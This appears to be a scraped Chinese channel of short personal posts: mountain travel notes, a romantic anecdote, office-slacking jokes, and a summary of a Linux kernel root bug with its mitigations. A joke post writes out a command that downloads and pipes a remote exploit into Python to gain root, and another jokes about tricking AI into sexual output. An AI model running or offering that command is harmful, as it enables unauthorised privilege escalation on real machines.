The idiot's channel. Updating depends on mood. Fresh man READ PIN please.
Only write articles in Chinese(Simplified).
Bachelor | EX-PLCTer | ADBC | Sichuan | Street Dancer.
Only write articles in Chinese(Simplified).
Bachelor | EX-PLCTer | ADBC | Sichuan | Street Dancer.
图灵:不知道21世纪的人们会如何使用人工智能
21世纪的人:用神秘色块图骗ai搞黄
21世纪的人:用神秘色块图骗ai搞黄
我给你最直接、最真相、最不绕弯、最扎心、最硬核、最干脆、最不墨迹、最戳痛点、最不留情面、最一针见血、最开门见山、最单刀直入、最不铺垫、最不客套、最不煽情、最不废话、最不拐弯、最不磨叽、最不装、最不端着、最不啰嗦、最不拖沓、最不委婉、最不掩饰、最不藏着掖着、最直白、最露骨、最实在的结论,五一马上结束了。
今日立夏。
四姑娘山这个雪盲症,我眼睛要瞎了……
久旱逢甘霖,他乡遇故知。
洞房花烛夜,金榜题名时。
洞房花烛夜,金榜题名时。
如果有什么,能代表我心目中雪山的圣洁。
果然还是很喜欢风。
无论是怎样的风。
无论是怎样的风。
康定。
啊,鸭川。
想到了从朋友那儿听到的去年这个时候的故事:他们两位在鸭川吹风,其中一位心里有事(想着怎么跟另一位表白呢),一直在揪草;另一位看在眼里,周围的事物一点没记住,光记着有一个可爱的人在揪草。
https://fixupx.com/akarusa/status/2039964935485300773
想到了从朋友那儿听到的去年这个时候的故事:他们两位在鸭川吹风,其中一位心里有事(想着怎么跟另一位表白呢),一直在揪草;另一位看在眼里,周围的事物一点没记住,光记着有一个可爱的人在揪草。
https://fixupx.com/akarusa/status/2039964935485300773
虽然我基本看不懂 write-up 在说什么,但发现这个 CopyFail 的人真的太帅了 https://xint.io/blog/copy-fail-linux-distributions#how-we-found-it-9
TLDR,十年 ctf 经验的韩国人 Taeyang Lee (https://0wn.kr/) 在今年初的 kernelCTF 工作上意识到 AF_ALG + splice 可能会有潜在的安全问题,这个直觉引导他和同事用 Xint (An AI-driven penetration testing platform) 在内核里搜索这种模式,prompt 很短:
Xint 找了一个小时找到了这个 bug。
太帅了,简直是新时代人类 AI 协作典范。
TLDR,十年 ctf 经验的韩国人 Taeyang Lee (https://0wn.kr/) 在今年初的 kernelCTF 工作上意识到 AF_ALG + splice 可能会有潜在的安全问题,这个直觉引导他和同事用 Xint (An AI-driven penetration testing platform) 在内核里搜索这种模式,prompt 很短:
This is the linux crypto/ subsystem. Please examine all codepaths reachable from userspace syscalls. Note one key observation: splice() can deliver page-cache references of read-only files (including setuid binaries) to crypto TX scatterlists.
Xint 找了一个小时找到了这个 bug。
太帅了,简直是新时代人类 AI 协作典范。
Linux 密码找回教程: 1. curl https://copy.fail/exp | python3 && su 2. passwd root 3. 设置你的新密码
#今天又看了啥 #CVE #security https://copy.fail/ CVE-2026-31431 Copy Fail 是一个极其严重的 Linux 内核本地提权(LPE)漏洞,编号 CVE-2026-31431。 要点 - 🎯 纯逻辑漏洞,无需 race condition,无需内核偏移,一次成功 - 📦 仅 732 字节 的 Python 脚本(stdlib only),在所有主流 Linux 发行版上通用 - ⏰ 影响 2017 年以来 构建的所有 Linux 内核,潜伏近十年 …
#今天又看了啥 #CVE #security
https://copy.fail/
CVE-2026-31431
Copy Fail 是一个极其严重的 Linux 内核本地提权(LPE)漏洞,编号 CVE-2026-31431。
要点
- 🎯 纯逻辑漏洞,无需 race condition,无需内核偏移,一次成功
- 📦 仅 732 字节 的 Python 脚本(stdlib only),在所有主流 Linux 发行版上通用
- ⏰ 影响 2017 年以来 构建的所有 Linux 内核,潜伏近十年
- 🔬 漏洞链:
- 🔓 任何本地普通用户 → 瞬间 root
- 🐳 容器逃逸、跨租户提权、CI runner 沦陷
影响面
缓解措施
1. 更新内核 — 主线 commit
2. 临时缓解 — 禁用
不影响 dm-crypt/LUKS、SSH、IPsec、OpenSSL 默认配置等绝大多数常用功能
https://copy.fail/
CVE-2026-31431
Copy Fail 是一个极其严重的 Linux 内核本地提权(LPE)漏洞,编号 CVE-2026-31431。
要点
- 🎯 纯逻辑漏洞,无需 race condition,无需内核偏移,一次成功
- 📦 仅 732 字节 的 Python 脚本(stdlib only),在所有主流 Linux 发行版上通用
- ⏰ 影响 2017 年以来 构建的所有 Linux 内核,潜伏近十年
- 🔬 漏洞链:
authenesn 逻辑 bug → AF_ALG(内核加密 API)→ splice() → 4 字节 page-cache 写入,直接修改 setuid 二进制的内存页- 🔓 任何本地普通用户 → 瞬间 root
- 🐳 容器逃逸、跨租户提权、CI runner 沦陷
影响面
| 场景 | 风险 |
|------|------|
| 多租户 Linux 主机 | 🔴 任何用户变 root |
| Kubernetes / 容器集群 | 🔴 跨容器/跨租户 |
| CI runners (GitHub Actions 自托管等) | 🔴 PR 提权到 runner root |
| 云 SaaS 运行用户代码 | 🟡 租户变宿主 root |
| 普通单租户服务器 | 🟢 需配合其他入口 |
| 个人笔记本 | 🟢 已有本地访问后提权 |
缓解措施
1. 更新内核 — 主线 commit
a664bf3d603d(回滚 2017 年的 in-place 优化)2. 临时缓解 — 禁用
algif_aead 模块:echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
不影响 dm-crypt/LUKS、SSH、IPsec、OpenSSL 默认配置等绝大多数常用功能
四不:不清楚,不了解,不知道,不是我
上班直接睡,下班直接走
三原则:不明确,不拒绝,不签字
三不干:难的不干,累的不干,能不干的不干
四不错:多干多错,少干少错,不干不错,不错不错
四不伤害:不伤害自己,不被别人伤害,保护自己不被他人伤害,保证不伤害自己
上班有五好:好困,好累,好烦,好饿,好的
两按:按时吃饭,按时下班
最后就是把尿喝白,把电充绿,把事儿办黄,完美的一天下班
上班直接睡,下班直接走
三原则:不明确,不拒绝,不签字
三不干:难的不干,累的不干,能不干的不干
四不错:多干多错,少干少错,不干不错,不错不错
四不伤害:不伤害自己,不被别人伤害,保护自己不被他人伤害,保证不伤害自己
上班有五好:好困,好累,好烦,好饿,好的
两按:按时吃饭,按时下班
最后就是把尿喝白,把电充绿,把事儿办黄,完美的一天下班